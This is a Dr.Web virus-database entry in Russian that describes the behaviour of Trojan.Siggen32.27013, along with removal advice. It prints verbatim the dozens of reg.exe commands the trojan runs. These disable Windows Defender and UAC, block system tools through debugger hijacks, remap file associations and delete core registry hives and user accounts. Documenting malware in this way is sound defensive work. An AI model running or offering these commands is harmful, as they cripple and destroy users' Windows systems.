Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.Siggen32.27013

Добавлен в вирусную базу Dr.Web: 2026-02-27

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe] 'Debugger' = ''
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe] 'Debugger' = ''
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smss.exe] 'Debugger' = ''
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe] 'Debugger' = ''
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winload.exe] 'Debugger' = ''
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe] 'Debugger' = ''
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winlogon.exe] 'Debugger' = ''
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe] 'Debugger' = ''
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe] 'Debugger' = ''
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dwm.exe] 'Debugger' = ''
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ntoskrnl.exe] 'Debugger' = ''
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\services.exe] 'Debugger' = ''
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe] 'Debugger' = ''
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wininit.exe] 'Debugger' = ''
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LogonUI.exe] 'Debugger' = ''
  • [HKLM\Software\Classes\.com] '' = 'txtfile'
  • [HKLM\Software\Classes\.cmd] '' = 'txtfile'
Вредоносные функции
Для затруднения выявления своего присутствия в системе
блокирует запуск следующих системных утилит:
  • Диспетчера задач (Taskmgr)
  • Редактора реестра (RegEdit)
  • Системный антивирус (Защитник Windows)
блокирует:
  • Средство контроля пользовательских учетных записей (UAC)
изменяет следующие системные настройки:
  • [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoViewContextMenu' = '00000001'
  • [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoDesktop' = '00000001'
  • [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoClose' = '00000001'
  • [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoLogOff' = '00000001'
удаляет теневые копии разделов.
Запускает большое число процессов
Завершает или пытается завершить
следующие системные процессы:
  • <SYSTEM32>\winlogon.exe
  • <SYSTEM32>\fontdrvhost.exe
  • <SYSTEM32>\sihost.exe
  • <SYSTEM32>\svchost.exe
  • %WINDIR%\explorer.exe
  • <SYSTEM32>\runtimebroker.exe
  • <SYSTEM32>\dllhost.exe
  • <SYSTEM32>\securityhealthsystray.exe
  • <SYSTEM32>\oobe\useroobebroker.exe
  • <SYSTEM32>\cmd.exe
  • <SYSTEM32>\reg.exe
  • <SYSTEM32>\csrss.exe
  • <SYSTEM32>\smss.exe
следующие пользовательские процессы:
  • iexplore.exe
  • firefox.exe
Изменения в файловой системе
Создает следующие файлы
  • <Текущая директория>\l.bat
  • %LOCALAPPDATA%\microsoft\windows\actioncentercache\windows-systemtoast-securityandmaintenance_10_0.png
Другое
Запускает на исполнение
  • '<SYSTEM32>\cmd.exe' /c <Текущая директория>\l.bat
  • '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\reg.exe' add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "" /f
  • '<SYSTEM32>\reg.exe' add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d 0 /f
  • '<SYSTEM32>\reg.exe' add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d 0 /f
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SYSTEM\Setup" /v "SetupPhase" /t REG_DWORD /d "00000001" /f
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SYSTEM\Setup" /v "SetupType" /t REG_DWORD /d "00000004" /f
  • '<SYSTEM32>\reg.exe' delete HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools Yes
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SYSTEM\Setup" /v "CmdLine" /t REG_SZ /d "taskkill /f /im wininit.exe" /f
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SYSTEM\Setup" /v "OsLoaderPath" /t REG_SZ /d "\\by:gun5xi and Bilibili:Fileless attack7891\\" /f
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SYSTEM\Setup" /v "RestartSetup" /t REG_DWORD /d "00000001" /f
  • '<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoToolbarsOnTaskbar" /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDesktop" /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoLogOff" /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /v "Debugger" /t REG_SZ /d "" /f
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe" /v "Debugger" /t REG_SZ /d "" /f
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smss.exe" /v "Debugger" /t REG_SZ /d "" /f
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe" /v "Debugger" /t REG_SZ /d "" /f
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winload.exe" /v "Debugger" /t REG_SZ /d "" /f
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe" /v "Debugger" /t REG_SZ /d "" /f
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winlogon.exe" /v "Debugger" /t REG_SZ /d "" /f
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe" /v "Debugger" /t REG_SZ /d "" /f
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe" /v "Debugger" /t REG_SZ /d "" /f
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dwm.exe" /v "Debugger" /t REG_SZ /d "" /f
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ntoskrnl.exe" /v "Debugger" /t REG_SZ /d "" /f
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\services.exe" /v "Debugger" /t REG_SZ /d "" /f
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe" /v "Debugger" /t REG_SZ /d "" /f
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wininit.exe" /v "Debugger" /t REG_SZ /d "" /f
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LogonUI.exe" /v "Debugger" /t REG_SZ /d "" /f
  • '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\Power" /f /va
  • '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\PowerMgr" /f /va
  • '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Control\Power" /f /va
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Control\Power" /v HibernateEnabled /d 0 /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Control\Power" /v StandbyEnabled /d 0 /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Control\Power" /v CsEnabled /d 0 /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Control\Power\PowerSettings\4f971e89-eebd-4455-a8de-9e59040e7347\7648efa3-dd9c-4e3e-b566-50f929386280" /v Attributes /d 1 /f
  • '<SYSTEM32>\reg.exe' add "HKCU\Control Panel\PowerCfg" /v PowerButtonAction /d "0" /f
  • '<SYSTEM32>\reg.exe' add "HKCU\Control Panel\PowerCfg" /v HibernateButtonAction /d "0" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 1 /t REG_SZ /d "cmd.exe" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 2 /t REG_SZ /d "*.bat" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 3 /t REG_SZ /d "*.cmd" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /d 1 /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.txt" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.log" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.ini" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.cfg" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.conf" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.inf" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.csv" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.c" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.cpp" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.h" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.hpp" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.java" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.py" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.js" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.php" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.html" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.htm" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.css" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.xml" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.json" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.doc" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.docx" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.xls" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.xlsx" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.ppt" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.pptx" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.rtf" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.odt" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.msi" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.com" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.cmd" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.vbs" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.ps1" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.sh" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.jpg" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.jpeg" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.png" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.gif" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.bmp" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.ico" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.svg" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.tiff" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.mp3" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.wav" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.flac" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.aac" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.ogg" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.wma" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.mp4" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.avi" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.mkv" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.mov" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.wmv" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.flv" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.m4v" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.zip" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.rar" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.7z" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.tar" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' add "HKCR\.gz" /ve /t REG_SZ /d "txtfile" /f
  • '<SYSTEM32>\reg.exe' delete "HKU\S-1-5-18" /f
  • '<SYSTEM32>\reg.exe' delete "HKU\S-1-5-19" /f
  • '<SYSTEM32>\reg.exe' delete "HKU\S-1-5-20" /f
  • '<SYSTEM32>\reg.exe' delete "HKCR\CLSID" /f
  • '<SYSTEM32>\reg.exe' delete "HKLM\SAM\SAM\Accounts\Users" /f /va
  • '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM" /f
  • '<SYSTEM32>\reg.exe' delete "HKLM\SOFTWARE" /f
  • '<SYSTEM32>\smss.exe' 000000e4 00000084
  • '<SYSTEM32>\smss.exe' 000000a0 00000084
  • '<SYSTEM32>\smss.exe' 000000cc 00000084
  • '<SYSTEM32>\smss.exe' 000000ec 00000084
  • '<SYSTEM32>\smss.exe' 000000c4 00000084
  • '<SYSTEM32>\smss.exe' 000000d0 00000084
  • '<SYSTEM32>\smss.exe' 000000e8 00000084
  • '<SYSTEM32>\smss.exe' 000000d4 00000084
  • '<SYSTEM32>\smss.exe' 000000c8 00000084
  • '<SYSTEM32>\smss.exe' 000000e0 00000084
  • '<SYSTEM32>\smss.exe' 00000100 00000084
  • '<SYSTEM32>\smss.exe' 000000f8 00000084
  • '<SYSTEM32>\smss.exe' 000000fc 00000084
  • '<SYSTEM32>\smss.exe' 000000f0 00000084
  • '<SYSTEM32>\smss.exe' 00000104 00000084
  • '<SYSTEM32>\smss.exe' 00000110 00000084
  • '<SYSTEM32>\smss.exe' 0000012c 00000084
  • '<SYSTEM32>\smss.exe' 00000140 00000084
  • '<SYSTEM32>\smss.exe' 00000154 00000084
  • '<SYSTEM32>\smss.exe' 00000168 00000084
  • '<SYSTEM32>\smss.exe' 0000017c 00000084
  • '<SYSTEM32>\smss.exe' 00000190 00000084
  • '<SYSTEM32>\smss.exe' 000001a4 00000084
  • '<SYSTEM32>\smss.exe' 000001b8 00000084
  • '<SYSTEM32>\smss.exe' 000001cc 00000084
  • '<SYSTEM32>\smss.exe' 000001e0 00000084
  • '<SYSTEM32>\smss.exe' 000001f0 00000084
  • '<SYSTEM32>\smss.exe' 000001e8 00000084
  • '<SYSTEM32>\smss.exe' 000001f8 00000084
  • '<SYSTEM32>\smss.exe' 0000011c 00000084
  • '<SYSTEM32>\smss.exe' 000001fc 00000084
  • '<SYSTEM32>\smss.exe' 0000020c 00000084
  • '<SYSTEM32>\smss.exe' 000001e4 00000084
  • '<SYSTEM32>\smss.exe' 00000220 00000084
  • '<SYSTEM32>\smss.exe' 00000234 00000084
  • '<SYSTEM32>\smss.exe' 000001dc 00000084
  • '<SYSTEM32>\smss.exe' 00000248 00000084
  • '<SYSTEM32>\smss.exe' 0000025c 00000084
  • '<SYSTEM32>\smss.exe' 000001ec 00000084
  • '<SYSTEM32>\smss.exe' 00000264 00000084
  • '<SYSTEM32>\smss.exe' 00000260 00000084
  • '<SYSTEM32>\smss.exe' 00000254 00000084
  • '<SYSTEM32>\smss.exe' 00000240 00000084
  • '<SYSTEM32>\smss.exe' 00000258 00000084
  • '<SYSTEM32>\smss.exe' 00000250 00000084
  • '<SYSTEM32>\smss.exe' 0000024c 00000084
  • '<SYSTEM32>\smss.exe' 00000238 00000084
  • '<SYSTEM32>\smss.exe' 00000244 00000084
  • '<SYSTEM32>\smss.exe' 0000023c 00000084
  • '<SYSTEM32>\smss.exe' 00000274 00000084
  • '<SYSTEM32>\smss.exe' 00000284 00000084
  • '<SYSTEM32>\smss.exe' 00000298 00000084
  • '<SYSTEM32>\smss.exe' 000002ac 00000084
  • '<SYSTEM32>\smss.exe' 000002c0 00000084
  • '<SYSTEM32>\smss.exe' 000002d4 00000084
  • '<SYSTEM32>\smss.exe' 000002e8 00000084
  • '<SYSTEM32>\smss.exe' 000002fc 00000084
  • '<SYSTEM32>\smss.exe' 00000310 00000084
  • '<SYSTEM32>\smss.exe' 00000324 00000084
  • '<SYSTEM32>\smss.exe' 00000200 00000084
  • '<SYSTEM32>\smss.exe' 0000031c 00000084
  • '<SYSTEM32>\smss.exe' 0000033c 00000084
  • '<SYSTEM32>\smss.exe' 00000348 00000084
  • '<SYSTEM32>\smss.exe' 0000035c 00000084
  • '<SYSTEM32>\smss.exe' 00000370 00000084
  • '<SYSTEM32>\smss.exe' 00000384 00000084
  • '<SYSTEM32>\smss.exe' 00000330 00000084
  • '<SYSTEM32>\smss.exe' 0000037c 00000084
  • '<SYSTEM32>\smss.exe' 0000039c 00000084
  • '<SYSTEM32>\smss.exe' 000003a8 00000084
  • '<SYSTEM32>\smss.exe' 000003bc 00000084
  • '<SYSTEM32>\smss.exe' 000003d0 00000084
  • '<SYSTEM32>\smss.exe' 000003e4 00000084
  • '<SYSTEM32>\smss.exe' 000003f8 00000084
  • '<SYSTEM32>\smss.exe' 000003fc 00000084
  • '<SYSTEM32>\smss.exe' 000003f4 00000084
  • '<SYSTEM32>\smss.exe' 000003f0 00000084
  • '<SYSTEM32>\smss.exe' 000003dc 00000084
  • '<SYSTEM32>\smss.exe' 000003e8 00000084
  • '<SYSTEM32>\smss.exe' 000003cc 00000084
  • '<SYSTEM32>\smss.exe' 000003c8 00000084
  • '<SYSTEM32>\smss.exe' 000003c0 00000084
  • '<SYSTEM32>\smss.exe' 000003a0 00000084
  • '<SYSTEM32>\smss.exe' 000003c4 00000084
  • '<SYSTEM32>\smss.exe' 000003a4 00000084
  • '<SYSTEM32>\smss.exe' 00000398 00000084
  • '<SYSTEM32>\smss.exe' 00000380 00000084
  • '<SYSTEM32>\smss.exe' 0000036c 00000084
  • '<SYSTEM32>\smss.exe' 00000368 00000084
  • '<SYSTEM32>\smss.exe' 00000360 00000084
  • '<SYSTEM32>\smss.exe' 00000340 00000084
  • '<SYSTEM32>\smss.exe' 00000364 00000084
  • '<SYSTEM32>\smss.exe' 00000344 00000084
  • '<SYSTEM32>\smss.exe' 00000338 00000084
  • '<SYSTEM32>\smss.exe' 00000320 00000084
  • '<SYSTEM32>\smss.exe' 00000318 00000084
  • '<SYSTEM32>\smss.exe' 0000030c 00000084
  • '<SYSTEM32>\smss.exe' 000002f0 00000084
  • '<SYSTEM32>\smss.exe' 000002ec 00000084
  • '<SYSTEM32>\smss.exe' 000002d0 00000084
  • '<SYSTEM32>\smss.exe' 000002c4 00000084
  • '<SYSTEM32>\smss.exe' 000002b0 00000084
  • '<SYSTEM32>\smss.exe' 000002cc 00000084
  • '<SYSTEM32>\smss.exe' 000002c8 00000084
  • '<SYSTEM32>\smss.exe' 000002a4 00000084
  • '<SYSTEM32>\smss.exe' 000002b8 00000084
  • '<SYSTEM32>\smss.exe' 000002a8 00000084
  • '<SYSTEM32>\smss.exe' 00000294 00000084
  • '<SYSTEM32>\smss.exe' 00000288 00000084
  • '<SYSTEM32>\smss.exe' 000002f8 00000084
  • '<SYSTEM32>\smss.exe' 00000270 00000084
  • '<SYSTEM32>\smss.exe' 000001f4 00000084
  • '<SYSTEM32>\smss.exe' 00000268 00000084
  • '<SYSTEM32>\smss.exe' 0000026c 00000084
  • '<SYSTEM32>\smss.exe' 0000029c 00000084
  • '<SYSTEM32>\smss.exe' 000002e0 00000084
  • '<SYSTEM32>\smss.exe' 0000032c 00000084
  • '<SYSTEM32>\smss.exe' 000002d8 00000084
  • '<SYSTEM32>\smss.exe' 00000378 00000084
  • '<SYSTEM32>\smss.exe' 00000388 00000084
  • '<SYSTEM32>\smss.exe' 00000334 00000084
  • '<SYSTEM32>\smss.exe' 000003b0 00000084
  • '<SYSTEM32>\smss.exe' 000003d4 00000084
  • '<SYSTEM32>\smss.exe' 00000390 00000084
  • '<SYSTEM32>\smss.exe' 00000394 00000084
  • '<SYSTEM32>\smss.exe' 000003ec 00000084
  • '<SYSTEM32>\smss.exe' 000003e0 00000084
  • '<SYSTEM32>\smss.exe' 000003b4 00000084
  • '<SYSTEM32>\smss.exe' 000003b8 00000084
  • '<SYSTEM32>\smss.exe' 0000038c 00000084
  • '<SYSTEM32>\smss.exe' 00000354 00000084
  • '<SYSTEM32>\smss.exe' 00000350 00000084
  • '<SYSTEM32>\smss.exe' 0000034c 00000084
  • '<SYSTEM32>\smss.exe' 000003d8 00000084
  • '<SYSTEM32>\smss.exe' 00000374 00000084
  • '<SYSTEM32>\smss.exe' 00000358 00000084
  • '<SYSTEM32>\smss.exe' 00000328 00000084
  • '<SYSTEM32>\smss.exe' 00000314 00000084
  • '<SYSTEM32>\smss.exe' 000002f4 00000084
  • '<SYSTEM32>\smss.exe' 000002e4 00000084
  • '<SYSTEM32>\smss.exe' 00000308 00000084
  • '<SYSTEM32>\smss.exe' 00000300 00000084
  • '<SYSTEM32>\smss.exe' 000002dc 00000084
  • '<SYSTEM32>\smss.exe' 000002b4 00000084
  • '<SYSTEM32>\smss.exe' 000002a0 00000084
  • '<SYSTEM32>\smss.exe' 0000027c 00000084
  • '<SYSTEM32>\smss.exe' 000003ac 00000084
  • '<SYSTEM32>\smss.exe' 00000290 00000084
  • '<SYSTEM32>\smss.exe' 00000278 00000084
  • '<SYSTEM32>\smss.exe' 00000280 00000084
  • '<SYSTEM32>\smss.exe' 0000028c 00000084
  • '<SYSTEM32>\smss.exe' 00000230 00000084
  • '<SYSTEM32>\smss.exe' 00000228 00000084
  • '<SYSTEM32>\smss.exe' 00000210 00000084
  • '<SYSTEM32>\smss.exe' 0000021c 00000084
  • '<SYSTEM32>\smss.exe' 00000204 00000084
  • '<SYSTEM32>\smss.exe' 00000214 00000084
  • '<SYSTEM32>\smss.exe' 000001d8 00000084
  • '<SYSTEM32>\smss.exe' 000001d0 00000084
  • '<SYSTEM32>\smss.exe' 000001c0 00000084
  • '<SYSTEM32>\smss.exe' 000001bc 00000084
  • '<SYSTEM32>\smss.exe' 000001a0 00000084
  • '<SYSTEM32>\smss.exe' 0000019c 00000084
  • '<SYSTEM32>\smss.exe' 00000194 00000084
  • '<SYSTEM32>\smss.exe' 00000174 00000084
  • '<SYSTEM32>\smss.exe' 00000198 00000084

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
